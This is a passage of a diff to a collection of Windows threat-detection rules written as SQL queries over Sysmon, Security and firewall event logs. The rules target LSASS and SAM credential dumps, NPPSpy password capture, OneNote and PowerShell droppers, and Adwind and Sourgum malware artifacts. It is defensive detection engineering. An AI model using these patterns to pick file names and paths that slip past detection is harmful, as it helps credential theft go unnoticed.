'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_security_scm_database_privileged_operation.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "Creation of an Executable by an Executable", + "id": "297afac9-5d02-4138-8c58-b977bac60556", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the creation of an executable by another executable", "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" - ], - "filename": "win_security_susp_lsass_dump.yml" - }, - { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_dropper.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "status": "test", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", + "description": "Detects PowerShell creating a binary executable or script file.", "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "tags": [ + "attack.persistence" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "The Windows Defender Firewall Service Failed To Load Group Policy", - "id": "7ec15688-fd24-4177-ba43-1a950537ee39", - "status": "experimental", - "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" - ], - "filename": "win_firewall_as_failed_load_gpo.yml" - }, - { - "title": "Firewall Rule Modified In The Windows Firewall Exception List", - "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "status": "experimental", - "description": "Detects when a rule has been modified in the windows firewall exception list", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2005' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_change_rule.yml" - }, - { - "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", - "id": "04b60639-39c0-412a-9fbe-e82499c881a3", - "status": "experimental", - "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2032')" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], - "filename": "win_firewall_as_reset_config.yml" - }, - { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" - ], - "filename": "win_firewall_as_delete_rule.yml" - }, - { - "title": "Windows Firewall Settings Have Been Changed", - "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "status": "experimental", - "description": "Detects activity when the settings of the Windows firewall have been changed", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2003', '2008'))" - ], - "filename": "win_firewall_as_setting_change.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR 